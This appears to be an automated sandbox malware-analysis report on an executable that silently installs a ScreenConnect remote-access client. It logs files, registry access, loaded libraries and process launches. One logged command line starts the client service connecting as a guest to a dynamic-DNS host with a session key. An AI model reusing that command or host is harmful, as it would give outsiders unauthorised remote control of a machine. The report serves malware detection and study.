                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: file.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_055B03D0 CreateProcessAsUserW,8_2_055B03D0
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5de52b.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{C65824D8-9903-AFB4-B430-141024FF968F}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7CB.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7EB.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC9F.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5de52d.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5de52d.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{C65824D8-9903-AFB4-B430-141024FF968F}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\2lempn5l.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\2lempn5l.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE7EB.tmpJump to behavior
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059EF0B00_2_059EF0B0
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059E6F000_2_059E6F00
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059E9F000_2_059E9F00
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059E60C00_2_059E60C0
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_059E6EF10_2_059E6EF1
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05A0039B0_2_05A0039B
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_013BD5888_2_013BD588
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051BE0C08_2_051BE0C0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051BC2608_2_051BC260
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051BE0C08_2_051BE0C0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051BC2608_2_051BC260
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_051B7CB88_2_051B7CB8
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E2BAD39_2_00007FFD33E2BAD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E271489_2_00007FFD33E27148
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E31FFA9_2_00007FFD33E31FFA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E2DBD39_2_00007FFD33E2DBD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E2DB859_2_00007FFD33E2DB85
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E329D39_2_00007FFD33E329D3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E210CF9_2_00007FFD33E210CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E210D79_2_00007FFD33E210D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E327559_2_00007FFD33E32755
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD33E2DCD39_2_00007FFD33E2DCD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34135CB19_2_00007FFD34135CB1
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD34136D4D9_2_00007FFD34136D4D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1BAD310_2_00007FFD33E1BAD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1714810_2_00007FFD33E17148
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E4877010_2_00007FFD33E48770
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1BBF310_2_00007FFD33E1BBF3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1DBD310_2_00007FFD33E1DBD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1DB8510_2_00007FFD33E1DB85
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E229D310_2_00007FFD33E229D3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E110CF10_2_00007FFD33E110CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E110D710_2_00007FFD33E110D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1375010_2_00007FFD33E13750
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E226FA10_2_00007FFD33E226FA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1EEC010_2_00007FFD33E1EEC0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1EE0D10_2_00007FFD33E1EE0D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD33E1DCD310_2_00007FFD33E1DCD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD3412E29610_2_00007FFD3412E296
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34125EF610_2_00007FFD34125EF6
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34122B9210_2_00007FFD34122B92
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD3412037010_2_00007FFD34120370
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD3412F04210_2_00007FFD3412F042
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD3412106810_2_00007FFD34121068
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD3412613410_2_00007FFD34126134
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34126D6810_2_00007FFD34126D68
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD34126B4D10_2_00007FFD34126B4D
                              Source: file.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: file.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: file.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: file.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: file.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: file.exe, 00000000.00000002.2159703802.0000000004480000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs file.exe
                              Source: file.exe, 00000000.00000000.2130060799.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs file.exe
                              Source: file.exe, 00000000.00000000.2130060799.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs file.exe
                              Source: file.exe, 00000000.00000002.2165204344.0000000007012000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs file.exe
                              Source: file.exe, 00000000.00000002.2154363991.00000000030A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs file.exe
                              Source: file.exe, 00000000.00000002.2163119833.0000000005CAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs file.exe
                              Source: file.exe, 00000000.00000002.2163119833.0000000005CAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs file.exe
                              Source: file.exe, 00000000.00000002.2163119833.0000000005CAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs file.exe
                              Source: file.exe, 00000000.00000002.2163119833.0000000005CAC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs file.exe
                              Source: file.exe, 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs file.exe
                              Source: file.exe, 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs file.exe
                              Source: file.exe, 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs file.exe
                              Source: file.exe, 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs file.exe
                              Source: file.exe, 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs file.exe
                              Source: file.exe, 00000000.00000002.2161488488.0000000005800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs file.exe
                              Source: file.exe, 00000000.00000002.2161488488.0000000005800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs file.exe
                              Source: file.exe, 00000000.00000002.2161488488.0000000005800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs file.exe
                              Source: file.exe, 00000000.00000002.2239658409.000000000B1C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs file.exe
                              Source: file.exe, 00000000.00000002.2161085051.0000000005670000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs file.exe
                              Source: file.exe, 00000000.00000002.2154804034.00000000031F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenamezlib.dll2 vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenamewixca.dll\ vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs file.exe
                              Source: file.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs file.exe
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.0.file.exe.a263d8.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.2.file.exe.5670000.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: classification engineClassification label: mal48.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: file.exeVirustotal: Detection: 26%
                              Source: file.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: file.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A716AADF688D387F4AEB51767417B70D C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 62F8343635E97A7D5BEDC1A49E3625BE
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3CDFD6ECE8056A2339D8E63B556C7FE0 E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "60081e8a-4d58-45ec-97b7-8f04b030d7f4" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "355be41b-df8e-4504-845b-0f4583aafa5e" "System"
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A716AADF688D387F4AEB51767417B70D CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 62F8343635E97A7D5BEDC1A49E3625BEJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3CDFD6ECE8056A2339D8E63B556C7FE0 E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "60081e8a-4d58-45ec-97b7-8f04b030d7f4" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "355be41b-df8e-4504-845b-0f4583aafa5e" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
